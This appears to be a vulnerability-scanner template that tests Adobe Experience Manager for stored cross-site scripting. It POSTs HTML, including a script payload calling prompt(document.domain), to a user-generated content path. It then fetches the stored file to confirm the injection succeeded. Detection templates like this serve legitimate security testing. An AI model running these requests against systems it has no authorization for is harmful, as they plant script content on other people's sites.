id: aem-stored-xss
single: true
info:
  name: AEM Stored XSS
  risk: High

params:
  - root: '{{.BaseURL}}'

variables:
  - ran: RandomString(6)
  - ext: |
      n
      .html
      .css
      .js
      .ico
  - payload: '<html><h1>example<s>d'

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/content/usergenerated/etc/commerce/smartlists/{{.ran}}{{.ext}}
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    body: >-
      jcr:data={{.payload}}d&jcr:mimeType=text/html
    detections:
      - >-
        StatusCode() == 200 && (StringSearch("response", "Content modified") ||  StringSearch("response", "Content created"))
  
  - method: POST
    redirect: false
    url: >-
      {{.root}}/content/usergenerated/etc/commerce/smartlists/rpoc{{.ran}}{{.ext}}
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    body: >-
      jcr:data=<html><h1>rps<script>prompt(document.domain)</script>e<s>d&jcr:mimeType=text/html
    detections:
      - >-
        StatusCode() == 200 && (StringSearch("response", "Content modified") ||  StringSearch("response", "Content created"))
  
  # verify that we got content created
  - method: GET
    redirect: false
    url: >-
      {{.root}}/content/usergenerated/etc/commerce/smartlists/{{.ran}}{{.ext}}
    headers:
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "{{.payload}}") && StringSearch("response", ".payload") && StringSearch("resHeaders", "text/html")

  - method: GET
    redirect: false
    url: >-
      {{.root}}/content/usergenerated/etc/commerce/smartlists.children.json/{{.ran}}{{.ext}}
    headers:
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "{{.payload}}") && StringSearch("response", ".payload") && StringSearch("resHeaders", "text/html")